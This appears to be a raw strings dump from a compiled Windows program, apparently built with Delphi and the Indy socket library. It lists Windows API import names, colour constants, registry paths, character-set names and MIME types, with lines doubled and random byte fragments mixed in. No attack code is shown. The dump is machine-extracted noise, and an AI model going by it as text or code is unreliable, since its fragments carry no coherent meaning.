oadImageWImageList_GetIconImageList_RemoveImageList_DrawExImageList_ReplaceImageList_DrawImageList_SetOverlayImageImageList_GetBkColorImageList_SetBkColorImageList_ReplaceIconImageList_AddImageList_SetImageCountImageList_GetImageCountImageList_DestroyImageList_CreateSleepIsEqualGUIDSafeArrayPtrOfIndexSafeArrayGetUBoundSafeArrayGetLBoundSafeArrayCreateVariantChangeTypeVariantCopyVariantClearVariantInitShellExecuteWSHGetSpecialFolderLocationSHGetPathFromIDListWOpenPrinterWEnumPrintersWDocumentPropertiesWClosePrinterGetDefaultPrinterWNetbios
lstrcmpiALoadLibraryALocalFreeLocalAllocGetACPSleepVirtualFreeVirtualAllocGetSystemInfoGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdVirtualQueryWideCharToMultiByteMultiByteToWideCharlstrlenWlstrcpynWLoadLibraryExWIsValidLocaleGetSystemDefaultUILanguageGetStartupInfoAGetProcAddressGetModuleHandleWGetModuleFileNameWGetUserDefaultUILanguageGetLocaleInfoWGetLastErrorGetCommandLineWFreeLibraryFindFirstFileWFindCloseExitProcessExitThreadCreateThreadCompareStringWWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionCloseHandleRegQueryValueExWRegOpenKeyExWRegCloseKeyLoadStringWMessageBoxACharNextWSysFreeStringSysReAllocStringLenSysAllocStringLenTlsSetValueTlsGetValueLocalAllocGetModuleHandleWCreateWindowExWWindowFromPointWaitMessageUpdateWindowUnregisterClassWUnhookWindowsHookExTranslateMessageTranslateMDISysAccelTrackPopupMenuSystemParametersInfoWShowWindowShowScrollBarShowOwnedPopupsSetWindowsHookExWSetWindowTextWSetWindowPosSetWindowPlacementSetWindowLongWSetTimerSetScrollRangeSetScrollPosSetScrollInfoSetRectSetPropWSetParentSetMenuItemInfoWSetMenuSetForegroundWindowSetFocusSetCursorPosSetCursorSetClassLongWSetCaptureSetActiveWindowSendMessageASendMessageWScrollWindowScreenToClientRemovePropWRemoveMenuReleaseDCReleaseCaptureRegisterWindowMessageWRegisterClipboardFormatWRegisterClassWRedrawWindowPtInRectPostQuitMessagePostMessageWPeekMessageAPeekMessageWOffsetRectMsgWaitForMultipleObjectsExMsgWaitForMultipleObjectsMessageBoxWMapWindowPointsMapVirtualKeyWLoadStringWLoadKeyboardLayoutWLoadIconWLoadCursorWLoadBitmapWKillTimerIsZoomedIsWindowVisibleIsWindowUnicodeIsWindowEnabledIsWindowIsIconicIsDialogMessageAIsDialogMessageWIsChildInvalidateRectIntersectRectInsertMenuItemWInsertMenuWInflateRectGetWindowThreadProcessIdGetWindowTextWGetWindowRectGetWindowPlacementGetWindowLongWGetWindowDCGetTopWindowGetSystemMetricsGetSystemMenuGetSysColorBrushGetSysColorGetSubMenuGetScrollRangeGetScrollPosGetScrollInfoGetPropWGetParentGetWindowGetMessageTimeGetMessagePosGetMessageExtraInfoGetMenuStringWGetMenuStateGetMenuItemInfoWGetMenuItemIDGetMenuItemCountGetMenuGetLastActivePopupGetKeyboardStateGetKeyboardLayoutNameWGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextWGetIconInfoGetForegroundWindowGetFocusGetDesktopWindowGetDCExGetDCGetCursorPosGetCursorGetClipboardDataGetClientRectGetClassLongWGetClassInfoWGetCaptureGetActiveWindowFrameRectFindWindowExWFindWindowWFillRectEnumWindowsEnumThreadWindowsEnumChildWindowsEndPaintEnableWindowEnableScrollBarEnableMenuItemDrawTextExWDrawTextWDrawMenuBarDrawIconExDrawIconDrawFrameControlDrawFocusRectDrawEdgeDispatchMessageADispatchMessageWDestroyWindowDestroyMenuDestroyIconDestroyCursorDeleteMenuDefWindowProcWDefMDIChildProcWDefFrameProcWCreatePopupMenuCreateMenuCreateIconCreateAcceleratorTableWCopyIconClientToScreenCheckMenuItemCharUpperBuffWCharNextWCharLowerBuffWCharLowerWCallWindowProcWCallNextHookExBeginPaintAdjustWindowRectExActivateKeyboardLayoutAlphaBlendUnrealizeObjectStretchDIBitsStretchBltStartPageStartDocWSetWindowOrgExSetWinMetaFileBitsSetViewportOrgExSetTextColorSetStretchBltModeSetROP2SetPixelSetMapModeSetEnhMetaFileBitsSetDIBitsSetDIBColorTableSetBrushOrgExSetBkModeSetBkColorSetAbortProcSelectPaletteSelectObjectSaveDCRoundRectRestoreDCResizePaletteRectangleRectVisibleRealizePalettePolylinePolygonPolyBezierToPolyBezierPlayEnhMetaFilePiePatBltMoveToExMaskBltLineToLPtoDPIntersectClipRectGetWindowOrgExGetWinMetaFileBitsGetTextMetricsWGetTextExtentPoint32WGetSystemPaletteEntriesGetStockObjectGetRgnBoxGetPixelGetPaletteEntriesGetObjectWGetNearestPaletteIndexGetEnhMetaFilePaletteEntriesGetEnhMetaFileHeaderGetEnhMetaFileDescriptionWGetEnhMetaFileBitsGetDeviceCapsGetDIBitsGetDIBColorTableGetDCOrgExGetCurrentPositionExGetClipBoxGetBrushOrgExGetBitmapBitsGdiFlushFrameRgnExtTextOutWExtFloodFillExcludeClipRectEnumFontsWEnumFontFamiliesExWEndPageEndDocEllipseDeleteObjectDeleteEnhMetaFileDeleteDCCreateSolidBrushCreateRectRgnCreatePenIndirectCreatePaletteCreateICWCreateHalftonePaletteCreateFontIndirectWCreateEnhMetaFileWCreateDIBitmapCreateDIBSectionCreateDCWCreateCompatibleDCCreateCompatibleBitmapCreateBrushIndirectCreateBitmapCopyEnhMetaFileWCloseEnhMetaFileChordBitBltArcAbortDocVerQueryValueWGetFileVersionInfoSizeWGetFileVersionInfoWlstrcpyWWritePrivateProfileStringWWriteFileWideCharToMultiByteWaitForSingleObjectWaitForMultipleObjectsExVirtualQueryExVirtualQueryVirtualFreeVirtualAllocTryEnterCriticalSectionSwitchToThreadSuspendThreadSleepSizeofResourceSignalObjectAndWaitSetThreadPrioritySetThreadLocaleSetLastErrorSetFilePointerSetFileAttributesWSetEventSetErrorModeSetEndOfFileResumeThreadResetEventReadFileReadDirectoryChangesWRaiseExceptionQueryPerformanceFrequencyQueryPerformanceCounterPostQueuedCompletionStatusIsDebuggerPresentMultiByteToWideCharMulDivMoveFileWLockResourceLoadResourceLoadLibraryWLeaveCriticalSectionInitializeCriticalSectionGlobalUnlockGlobalSizeGlobalLockGlobalFreeGlobalFindAtomWGlobalDeleteAtomGlobalAllocGlobalAddAtomWGetVersionExWGetVersionGetUserDefaultLCIDGetTimeZoneInformationGetTickCountGetThreadPriorityGetThreadLocaleGetTempPathWGetStdHandleGetQueuedCompletionStatusGetProcAddressGetPrivateProfileStringWGetModuleHandleWGetModuleFileNameWGetLocaleInfoWGetLocalTimeGetLastErrorGetFullPathNameWGetFileSizeGetFileAttributesWGetExitCodeThreadGetExitCodeProcessGetDiskFreeSpaceWGetDateFormatWGetCurrentThreadIdGetCurrentThreadGetCurrentProcessIdGetCurrentProcessGetComputerNameWGetCPInfoFreeResourceInterlockedExchangeAddInterlockedExchangeInterlockedCompareExchangeFreeLibraryFormatMessageWFindResourceWFindNextFileWFindFirstFileWFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeExitProcessEnumCalendarInfoWEnterCriticalSectionDeleteFileWDeleteCriticalSectionCreateThreadCreateProcessWCreateIoCompletionPortCreateFileWCreateEventWCopyFileWCompareStringWCloseHandleRegUnLoadKeyWRegSetValueExWRegSaveKeyWRegRestoreKeyWRegReplaceKeyWRegQueryValueExWRegQueryInfoKeyWRegOpenKeyExWRegLoadKeyWRegFlushKeyRegEnumValueWRegEnumKeyExWRegDeleteValueWRegDeleteKeyWRegCreateKeyExWRegConnectRegistryWRegCloseKeyGetErrorInfoGetActiveObjectSysFreeStringCreateStreamOnHGlobalOleRegEnumVerbsIsAcceleratorOleDrawOleSetMenuDescriptorOleUninitializeOleInitializeCoTaskMemFreeProgIDFromCLSIDStringFromCLSIDCoCreateInstanceCoGetClassObjectCoUninitializeCoInitializeIsEqualGUIDInitializeFlatSBFlatSB_SetScrollPropFlatSB_SetScrollPosFlatSB_SetScrollInfoFlatSB_GetScrollPosFlatSB_GetScrollInfo_TrackMouseEventImageList_GetImageInfoImageList_SetIconSizeImageList_GetIconSizeImageList_WriteImageList_ReadImageList_GetDragImageImageList_DragShowNolockImageList_DragMoveImageList_DragLeaveImageList_DragEnterImageList_EndDragImageList_BeginDragImageList_CopyImageList_LoadImageWImageList_GetIconImageList_RemoveImageList_DrawExImageList_ReplaceImageList_DrawImageList_SetOverlayImageImageList_GetBkColorImageList_SetBkColorImageList_ReplaceIconImageList_AddImageList_SetImageCountImageList_GetImageCountImageList_DestroyImageList_CreateSleepIsEqualGUIDSafeArrayPtrOfIndexSafeArrayGetUBoundSafeArrayGetLBoundSafeArrayCreateVariantChangeTypeVariantCopyVariantClearVariantInitShellExecuteWSHGetSpecialFolderLocationSHGetPathFromIDListWOpenPrinterWEnumPrintersWDocumentPropertiesWClosePrinterGetDefaultPrinterWNetbios
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
KERNEL32.DLL
KERNEL32.DLL
D.hlL
D.hlL
tV!.UJ
tV!.UJ
.fEDu
.fEDu
XR&%XR(
XR&%XR(
Q.LeS
Q.LeS
eQ.XT
eQ.XT
?|%c?
?|%c?
].zd)
].zd)
(4.K%S
(4.K%S
z].Zk
z].Zk
s.iT7
s.iT7
f.EQ/
f.EQ/
gpU?.cJ
gpU?.cJ
iA/4.Cc
iA/4.Cc
=%x
=%x
O.Edy
O.Edy
.eO=
.eO=
%TCp1
%TCp1
#?tSQL
#?tSQL
XofeÒ
XofeÒ
FJ1.Hb
FJ1.Hb
.zpJPr
.zpJPr
)k %s
)k %s
%ud3q:I
%ud3q:I
,%X9&
,%X9&
.SG5I
.SG5I
AWeB
AWeB
#UG%D;5g
#UG%D;5g
tj-Bf}
tj-Bf}
(-M}
(-M}
e5y%f
e5y%f
W%I%sV
W%I%sV
%S-3f
%S-3f
}rh%D'
}rh%D'
þ0c
þ0c
ONxW%U
ONxW%U
yV2.nE
yV2.nE
lK.rF
lK.rF
$5x%X
$5x%X
Z.aRU-Y
Z.aRU-Y
n%uU;]
n%uU;]
w.VB'6
w.VB'6
R%s^`-=
R%s^`-=
"R.jXNL
"R.jXNL
.Hxs}
.Hxs}
.CuJ@:?
.CuJ@:?
;#,
;#,
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
USER32.DLL
USER32.DLL
\\?\UNC\
\\?\UNC\
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
%s (*.%s)|*.%1:s
%s (*.%s)|*.%1:s
%s (%s)|%1:s|
%s (%s)|%1:s|
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
clWebSnow
clWebSnow
clWebFloralWhite
clWebFloralWhite
clWebLavenderBlush
clWebLavenderBlush
clWebOldLace
clWebOldLace
clWebIvory
clWebIvory
clWebCornSilk
clWebCornSilk
clWebBeige
clWebBeige
clWebAntiqueWhite
clWebAntiqueWhite
clWebWheat
clWebWheat
clWebAliceBlue
clWebAliceBlue
clWebGhostWhite
clWebGhostWhite
clWebLavender
clWebLavender
clWebSeashell
clWebSeashell
clWebLightYellow
clWebLightYellow
clWebPapayaWhip
clWebPapayaWhip
clWebNavajoWhite
clWebNavajoWhite
clWebMoccasin
clWebMoccasin
clWebBurlywood
clWebBurlywood
clWebAzure
clWebAzure
clWebMintcream
clWebMintcream
clWebHoneydew
clWebHoneydew
clWebLinen
clWebLinen
clWebLemonChiffon
clWebLemonChiffon
clWebBlanchedAlmond
clWebBlanchedAlmond
clWebBisque
clWebBisque
clWebPeachPuff
clWebPeachPuff
clWebTan
clWebTan
clWebYellow
clWebYellow
clWebDarkOrange
clWebDarkOrange
clWebRed
clWebRed
clWebDarkRed
clWebDarkRed
clWebMaroon
clWebMaroon
clWebIndianRed
clWebIndianRed
clWebSalmon
clWebSalmon
clWebCoral
clWebCoral
clWebGold
clWebGold
clWebTomato
clWebTomato
clWebCrimson
clWebCrimson
clWebBrown
clWebBrown
clWebChocolate
clWebChocolate
clWebSandyBrown
clWebSandyBrown
clWebLightSalmon
clWebLightSalmon
clWebLightCoral
clWebLightCoral
clWebOrange
clWebOrange
clWebOrangeRed
clWebOrangeRed
clWebFirebrick
clWebFirebrick
clWebSaddleBrown
clWebSaddleBrown
clWebSienna
clWebSienna
clWebPeru
clWebPeru
clWebDarkSalmon
clWebDarkSalmon
clWebRosyBrown
clWebRosyBrown
clWebPaleGoldenrod
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebLightGoldenrodYellow
clWebOlive
clWebOlive
clWebForestGreen
clWebForestGreen
clWebGreenYellow
clWebGreenYellow
clWebChartreuse
clWebChartreuse
clWebLightGreen
clWebLightGreen
clWebAquamarine
clWebAquamarine
clWebSeaGreen
clWebSeaGreen
clWebGoldenRod
clWebGoldenRod
clWebKhaki
clWebKhaki
clWebOliveDrab
clWebOliveDrab
clWebGreen
clWebGreen
clWebYellowGreen
clWebYellowGreen
clWebLawnGreen
clWebLawnGreen
clWebPaleGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumAquamarine
clWebMediumSeaGreen
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkOliveGreen
clWebDarkgreen
clWebDarkgreen
clWebLimeGreen
clWebLimeGreen
clWebLime
clWebLime
clWebSpringGreen
clWebSpringGreen
clWebMediumSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebPaleTurquoise
clWebLightCyan
clWebLightCyan
clWebLightBlue
clWebLightBlue
clWebLightSkyBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebDarkBlue
clWebIndigo
clWebIndigo
clWebMediumTurquoise
clWebMediumTurquoise
clWebTurquoise
clWebTurquoise
clWebCyan
clWebCyan
clWebPowderBlue
clWebPowderBlue
clWebSkyBlue
clWebSkyBlue
clWebRoyalBlue
clWebRoyalBlue
clWebMediumBlue
clWebMediumBlue
clWebMidnightBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebDarkTurquoise
clWebCadetBlue
clWebCadetBlue
clWebDarkCyan
clWebDarkCyan
clWebTeal
clWebTeal
clWebDeepskyBlue
clWebDeepskyBlue
clWebDodgerBlue
clWebDodgerBlue
clWebBlue
clWebBlue
clWebNavy
clWebNavy
clWebDarkViolet
clWebDarkViolet
clWebDarkOrchid
clWebDarkOrchid
clWebMagenta
clWebMagenta
clWebDarkMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebMediumVioletRed
clWebPaleVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebBlueViolet
clWebMediumOrchid
clWebMediumOrchid
clWebMediumPurple
clWebMediumPurple
clWebPurple
clWebPurple
clWebDeepPink
clWebDeepPink
clWebLightPink
clWebLightPink
clWebViolet
clWebViolet
clWebOrchid
clWebOrchid
clWebPlum
clWebPlum
clWebThistle
clWebThistle
clWebHotPink
clWebHotPink
clWebPink
clWebPink
clWebLightSteelBlue
clWebLightSteelBlue
clWebMediumSlateBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebLightSlateGray
clWebWhite
clWebWhite
clWebLightgrey
clWebLightgrey
clWebGray
clWebGray
clWebSteelBlue
clWebSteelBlue
clWebSlateBlue
clWebSlateBlue
clWebSlateGray
clWebSlateGray
clWebWhiteSmoke
clWebWhiteSmoke
clWebSilver
clWebSilver
clWebDimGray
clWebDimGray
clWebMistyRose
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlateBlue
clWebDarkSlategray
clWebDarkSlategray
clWebGainsboro
clWebGainsboro
clWebDarkGray
clWebDarkGray
clWebBlack
clWebBlack
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
%s, ClassID: %s
%s, ClassID: %s
olepro32.dll
olepro32.dll
%d - %s
%d - %s
C:\Builds\TP\indysockets\lib\System\IdStreamVCL.pas
C:\Builds\TP\indysockets\lib\System\IdStreamVCL.pas
C:\Builds\TP\indysockets\lib\System\IdGlobal.pas
C:\Builds\TP\indysockets\lib\System\IdGlobal.pas
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
%s, %.2d-%s-%.2d %s %s
%s, %.2d-%s-%.2d %s %s
10.5.5
10.5.5
WS2_32.DLL
WS2_32.DLL
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
MSWSOCK.DLL
MSWSOCK.DLL
WSARecvMsg
WSARecvMsg
WSASendMsg
WSASendMsg
Wship6.dll
Wship6.dll
Fwpuclnt.dll
Fwpuclnt.dll
127.0.0.1
127.0.0.1
C:\Builds\TP\indysockets\lib\System\IdStack.pas
C:\Builds\TP\indysockets\lib\System\IdStack.pas
255.255.255.255
255.255.255.255
C:\Builds\TP\indysockets\lib\Core\IdIOHandler.pas
C:\Builds\TP\indysockets\lib\Core\IdIOHandler.pas
0.0.0.0
0.0.0.0
0.0.0.1
0.0.0.1
C:\Builds\TP\indysockets\lib\Core\IdIOHandlerStack.pas
C:\Builds\TP\indysockets\lib\Core\IdIOHandlerStack.pas
ISO_646.irv:1991
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.basic:1983
ISO_646.irv:1983
ISO_646.irv:1983
csISO16Portuguese
csISO16Portuguese
csISO84Portuguese2
csISO84Portuguese2
windows-936
windows-936
csShiftJIS
csShiftJIS
ISO-8859-1-Windows-3.0-Latin-1
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csWindows31Latin5
csMicrosoftPublishing
csMicrosoftPublishing
Windows-31J
Windows-31J
csWindows31J
csWindows31J
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
.nml=animation/narrative
.nml=animation/narrative
.aiff=audio/x-aiff
.aiff=audio/x-aiff
.au=audio/basic
.au=audio/basic
.mid=midi/mid
.mid=midi/mid
.mp3=audio/x-mpg
.mp3=audio/x-mpg
.m3u=audio/x-mpegurl
.m3u=audio/x-mpegurl
.qcp=audio/vnd.qcelp
.qcp=audio/vnd.qcelp
.ra=audio/x-realaudio
.ra=audio/x-realaudio
.wav=audio/x-wav
.wav=audio/x-wav
.gsm=audio/x-gsm
.gsm=audio/x-gsm
.wax=audio/x-ms-wax
.wax=audio/x-ms-wax
.wma=audio/x-ms-wma
.wma=audio/x-ms-wma
.ram=audio/x-pn-realaudio
.ram=audio/x-pn-realaudio
.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile
.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile
.bmp=image/bmp
.bmp=image/bmp
.gif=image/gif
.gif=image/gif
.jpg=image/jpeg
.jpg=image/jpeg
.jpeg=image/jpeg
.jpeg=image/jpeg
.jpe=image/jpeg
.jpe=image/jpeg
.pict=image/x-pict
.pict=image/x-pict
.png=image/x-png
.png=image/x-png
.svg=image/svg-xml
.svg=image/svg-xml
.tif=image/x-tiff
.tif=image/x-tiff
.rf=image/vnd.rn-realflash
.rf=image/vnd.rn-realflash
.rp=image/vnd.rn-realpix
.rp=image/vnd.rn-realpix
.ico=image/x-icon
.ico=image/x-icon
.art=image/x-jg
.art=image/x-jg
.pntg=image/x-macpaint
.pntg=image/x-macpaint
.qtif=image/x-quicktime
.qtif=image/x-quicktime
.sgi=image/x-sgi
.sgi=image/x-sgi
.targa=image/x-targa
.targa=image/x-targa
.xbm=image/xbm
.xbm=image/xbm
.psd=image/x-psd
.psd=image/x-psd
.pnm=image/x-portable-anymap
.pnm=image/x-portable-anymap
.pbm=image/x-portable-bitmap
.pbm=image/x-portable-bitmap
.pgm=image/x-portable-graymap
.pgm=image/x-portable-graymap
.ppm=image/x-portable-pixmap
.ppm=image/x-portable-pixmap
.rgb=image/x-rgb
.rgb=image/x-rgb
.xbm=image/x-xbitmap
.xbm=image/x-xbitmap
.xpm=image/x-xpixmap
.xpm=image/x-xpixmap
.xwd=image/x-xwindowdump
.xwd=image/x-xwindowdump
.xml=text/xml
.xml=text/xml
.uls=text/iuls
.uls=text/iuls
.txt=text/plain
.txt=text/plain
.rtx=text/richtext
.rtx=text/richtext
.wsc=text/scriptlet
.wsc=text/scriptlet
.rt=text/vnd.rn-realtext
.rt=text/vnd.rn-realtext
.htt=text/webviewhtml
.htt=text/webviewhtml
.htc=text/x-component
.htc=text/x-component
.vcf=text/x-vcard
.vcf=text/x-vcard
.avi=video/x-msvideo
.avi=video/x-msvideo
.flc=video/flc
.flc=video/flc
.mp2=video/mpeg
.mp2=video/mpeg
.mp3=video/mpeg
.mp3=video/mpeg
.mp4=video/mpeg
.mp4=video/mpeg
.mpeg=video/x-mpeg2a
.mpeg=video/x-mpeg2a
.mpa=video/mpeg
.mpa=video/mpeg
.mpe=video/mpeg
.mpe=video/mpeg
.mpg=video/mpeg
.mpg=video/mpeg
.mov=video/quicktime
.mov=video/quicktime
.rv=video/vnd.rn-realvideo
.rv=video/vnd.rn-realvideo
.ivf=video/x-ivf
.ivf=video/x-ivf
.wm=video/x-ms-wm
.wm=video/x-ms-wm
.wmp=video/x-ms-wmp
.wmp=video/x-ms-wmp
.wmv=video/x-ms-wmv
.wmv=video/x-ms-wmv
.wmx=video/x-ms-wmx
.wmx=video/x-ms-wmx
.wvx=video/x-ms-wvx
.wvx=video/x-ms-wvx
.rms=video/vnd.rn-realvideo-secure
.rms=video/vnd.rn-realvideo-secure
.asx=video/x-ms-asf-plugin
.asx=video/x-ms-asf-plugin
.movie=video/x-sgi-movie
.movie=video/x-sgi-movie
.aab=application/x-authorware-bin
.aab=application/x-authorware-bin
.aam=application/x-authorware-map
.aam=application/x-authorware-map
.aas=application/x-authorware-seg
.aas=application/x-authorware-seg
.abw=application/x-abiword
.abw=application/x-abiword
.ai=application/postscript
.ai=application/postscript
.arj=application/x-arj
.arj=application/x-arj
.asf=application/vnd.ms-asf
.asf=application/vnd.ms-asf
.bat=application/x-msdos-program
.bat=application/x-msdos-program
.bcpio=application/x-bcpio
.bcpio=application/x-bcpio
.bz2=application/x-bzip2
.bz2=application/x-bzip2
.cab=application/vnd.ms-cab-compressed
.cab=application/vnd.ms-cab-compressed
.cat=application/vnd.ms-pki.seccat
.cat=application/vnd.ms-pki.seccat
.ccn=application/x-cnc
.ccn=application/x-cnc
.cco=application/x-cocoa
.cco=application/x-cocoa
.cdf=application/x-cdf
.cdf=application/x-cdf
.cer=application/x-x509-ca-cert
.cer=application/x-x509-ca-cert
.chm=application/vnd.ms-htmlhelp
.chm=application/vnd.ms-htmlhelp
.chrt=application/vnd.kde.kchart
.chrt=application/vnd.kde.kchart
.cil=application/vnd.ms-artgalry
.cil=application/vnd.ms-artgalry
.class=application/java-vm
.class=application/java-vm
.com=application/x-msdos-program
.com=application/x-msdos-program
.clp=application/x-msclip
.clp=application/x-msclip
.cpio=application/x-cpio
.cpio=application/x-cpio
.cpt=application/mac-compactpro
.cpt=application/mac-compactpro
.cqk=application/x-calquick
.cqk=application/x-calquick
.crd=application/x-mscardfile
.crd=application/x-mscardfile
.crl=application/pkix-crl
.crl=application/pkix-crl
.csh=application/x-csh
.csh=application/x-csh
.dbf=application/x-dbase
.dbf=application/x-dbase
.dcr=application/x-director
.dcr=application/x-director
.deb=application/x-debian-package
.deb=application/x-debian-package
.dir=application/x-director
.dir=application/x-director
.dist=vnd.apple.installer xml
.dist=vnd.apple.installer xml
.distz=vnd.apple.installer xml
.distz=vnd.apple.installer xml
.dll=application/x-msdos-program
.dll=application/x-msdos-program
.dmg=application/x-apple-diskimage
.dmg=application/x-apple-diskimage
.doc=application/msword
.doc=application/msword
.dot=application/msword
.dot=application/msword
.dvi=application/x-dvi
.dvi=application/x-dvi
.dxr=application/x-director
.dxr=application/x-director
.ebk=application/x-expandedbook
.ebk=application/x-expandedbook
.eps=application/postscript
.eps=application/postscript
.evy=application/envoy
.evy=application/envoy
.exe=application/x-msdos-program
.exe=application/x-msdos-program
.fdf=application/vnd.fdf
.fdf=application/vnd.fdf
.fif=application/fractals
.fif=application/fractals
.flm=application/vnd.kde.kivio
.flm=application/vnd.kde.kivio
.fml=application/x-file-mirror-list
.fml=application/x-file-mirror-list
.gnumeric=application/x-gnumeric
.gnumeric=application/x-gnumeric
.gtar=application/x-gtar
.gtar=application/x-gtar
.gz=application/x-gzip
.gz=application/x-gzip
.hdf=application/x-hdf
.hdf=application/x-hdf
.hlp=application/winhlp
.hlp=application/winhlp
.hpf=application/x-icq-hpf
.hpf=application/x-icq-hpf
.hqx=application/mac-binhex40
.hqx=application/mac-binhex40
.hta=application/hta
.hta=application/hta
.ims=application/vnd.ms-ims
.ims=application/vnd.ms-ims
.ins=application/x-internet-signup
.ins=application/x-internet-signup
.iii=application/x-iphone
.iii=application/x-iphone
.iso=application/x-iso9660-image
.iso=application/x-iso9660-image
.jar=application/java-archive
.jar=application/java-archive
.karbon=application/vnd.kde.karbon
.karbon=application/vnd.kde.karbon
.kfo=application/vnd.kde.kformula
.kfo=application/vnd.kde.kformula
.kon=application/vnd.kde.kontour
.kon=application/vnd.kde.kontour
.kpr=application/vnd.kde.kpresenter
.kpr=application/vnd.kde.kpresenter
.kpt=application/vnd.kde.kpresenter
.kpt=application/vnd.kde.kpresenter
.kwd=application/vnd.kde.kword
.kwd=application/vnd.kde.kword
.kwt=application/vnd.kde.kword
.kwt=application/vnd.kde.kword
.latex=application/x-latex
.latex=application/x-latex
.lha=application/x-lzh
.lha=application/x-lzh
.lcc=application/fastman
.lcc=application/fastman
.lrm=application/vnd.ms-lrm
.lrm=application/vnd.ms-lrm
.lzh=application/x-lzh
.lzh=application/x-lzh
.mpp=application/vnd.ms-project
.mpp=application/vnd.ms-project
.mvb=application/x-msmediaview
.mvb=application/x-msmediaview
.man=application/x-troff-man
.man=application/x-troff-man
.mdb=application/x-msaccess
.mdb=application/x-msaccess
.me=application/x-troff-me
.me=application/x-troff-me
.ms=application/x-troff-ms
.ms=application/x-troff-ms
.msi=application/x-msi
.msi=application/x-msi
.mpkg=vnd.apple.installer xml
.mpkg=vnd.apple.installer xml
.mny=application/x-msmoney
.mny=application/x-msmoney
.nix=application/x-mix-transfer
.nix=application/x-mix-transfer
.oda=application/oda
.oda=application/oda
.odb=application/vnd.oasis.opendocument.database
.odb=application/vnd.oasis.opendocument.database
.odc=application/vnd.oasis.opendocument.chart
.odc=application/vnd.oasis.opendocument.chart
.odf=application/vnd.oasis.opendocument.formula
.odf=application/vnd.oasis.opendocument.formula
.odg=application/vnd.oasis.opendocument.graphics
.odg=application/vnd.oasis.opendocument.graphics
.odi=application/vnd.oasis.opendocument.image
.odi=application/vnd.oasis.opendocument.image
.odm=application/vnd.oasis.opendocument.text-master
.odm=application/vnd.oasis.opendocument.text-master
.odp=application/vnd.oasis.opendocument.presentation
.odp=application/vnd.oasis.opendocument.presentation
.ods=application/vnd.oasis.opendocument.spreadsheet
.ods=application/vnd.oasis.opendocument.spreadsheet
.ogg=application/ogg
.ogg=application/ogg
.odt=application/vnd.oasis.opendocument.text
.odt=application/vnd.oasis.opendocument.text
.otg=application/vnd.oasis.opendocument.graphics-template
.otg=application/vnd.oasis.opendocument.graphics-template
.oth=application/vnd.oasis.opendocument.text-web
.oth=application/vnd.oasis.opendocument.text-web
.otp=application/vnd.oasis.opendocument.presentation-template
.otp=application/vnd.oasis.opendocument.presentation-template
.ots=application/vnd.oasis.opendocument.spreadsheet-template
.ots=application/vnd.oasis.opendocument.spreadsheet-template
.ott=application/vnd.oasis.opendocument.text-template
.ott=application/vnd.oasis.opendocument.text-template
.p7b=application/x-pkcs7-certificates
.p7b=application/x-pkcs7-certificates
.p7r=application/x-pkcs7-certreqresp
.p7r=application/x-pkcs7-certreqresp
.package=application/vnd.autopackage
.package=application/vnd.autopackage
.pfr=application/font-tdpfr
.pfr=application/font-tdpfr
.pkg=vnd.apple.installer xml
.pkg=vnd.apple.installer xml
.pdf=application/pdf
.pdf=application/pdf
.pko=application/vnd.ms-pki.pko
.pko=application/vnd.ms-pki.pko
